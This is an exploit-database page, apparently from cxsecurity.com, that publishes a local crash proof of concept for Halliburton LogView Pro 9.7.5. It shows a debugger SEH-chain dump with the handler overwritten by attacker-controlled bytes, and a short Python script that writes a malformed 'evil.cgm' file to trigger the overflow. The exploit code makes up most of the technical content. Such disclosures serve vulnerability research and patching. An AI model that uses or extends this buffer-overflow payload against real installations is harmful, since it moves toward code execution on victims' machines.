Halliburton LogView Pro 9.7.5 Crash PoC

2016.08.02
Credit: Karn Ganeshen
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: [Haliburton LogView Pro v9.7.5] # Exploit Author: [Karn Ganeshen] # Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe] # Version: [Current version 9.7.5] # Tested on: [Windows Vista Ultimate SP2] # # Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten # # SEH chain of main thread # Address SE handler # 0012D22C kernel32.76B6FEF9 # 0012D8CC 42424242 # 41414141 *** CORRUPT ENTRY *** # #!/usr/bin/python file="evil.cgm" buffer = "A"*804 + "B"*4 file = open(file, 'w') file.write(buffer) file.close() # +++++


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top